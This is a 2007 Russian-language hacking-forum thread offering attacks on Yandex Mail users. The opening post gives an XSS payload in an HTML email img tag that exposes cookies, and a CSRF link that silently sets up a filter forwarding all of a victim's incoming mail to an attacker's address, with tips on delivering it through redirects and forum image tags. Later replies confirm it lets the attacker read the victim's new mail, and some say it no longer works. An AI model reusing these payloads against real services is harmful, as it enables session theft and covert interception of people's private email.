Яндекс.Почта Hijacking

Discussion in 'Уязвимости Mail-сервисов' started by V1k, 19 Aug 2007.

  1. V1k

    V1k Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    38
    Likes Received:
    32
    Reputations:
    13
    1. XSS
    При получении письма в html-формате, url картинки из img тэга добавляется в onerror событие. чтобы получить всплывающее окно с cookies, нужно отправить письмо вида
    Code:
    <img src=http://ya.ru/a?');alert(document.cookie+'>
    2. Mail Forwarding
    При создании почтовых фильтров возможна передача параметров методом get. при этом нет никакой дополнительной проверки. Если пользователь перейдет по ссылке вида
    Code:
    http://mail.yandex.ru/classic/action_setup_filter_create?filter_name=%20&letter=selected&logic=0&field1=from&field2=4&field3=neverwillbereceived&move_folder=%D0%92%D1%85%D0%BE%D0%B4%D1%8F%D1%89%D0%B8%D0%B5&cliker=forward&[email protected]&forward_with_store=on&order=1
    то отныне вся входящая почта будет пересылаться также на адрес [email protected]. С помощью <?php header() ?> + apache + mod_rewrite можно похищать почту пользователей с незавершенными сессиями на yandex.ru, например, на этом ресурсе, используя img bbcode.
     
    #1 V1k, 19 Aug 2007
    Last edited: 19 Aug 2007
    5 people like this.
  2. Alexsize

    Alexsize Fail

    Joined:
    17 Sep 2005
    Messages:
    1,771
    Likes Received:
    1,221
    Reputations:
    704
    То есть, фактичеки это позволит читать письма жертвы?
     
  3. V1k

    V1k Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    38
    Likes Received:
    32
    Reputations:
    13
    те, которые придут после просмотра жертвой картинки/посещения ссылки -да
     
  4. DSSS

    DSSS New Member

    Joined:
    18 Jun 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    баян
     
  5. Skaret

    Skaret New Member

    Joined:
    13 Aug 2007
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Что-то не работает..Ты сам проверял?
     
  6. inv

    inv Banned

    Joined:
    3 Aug 2007
    Messages:
    261
    Likes Received:
    143
    Reputations:
    -58
    честно говоря я сам уже давно не проверял
    раньше для создания фильтра на яндексе вроде был важен реферер,гет запрос прокатывал
    На рамблере например реферер не помню проверяется или нет,вроде нет,
    но катит только пост запрос,по крайней мере когда это пробовал я..
     
  7. vadim399

    vadim399 Banned

    Joined:
    27 May 2007
    Messages:
    325
    Likes Received:
    180
    Reputations:
    -3
    Нече не пашет...
     
    1 person likes this.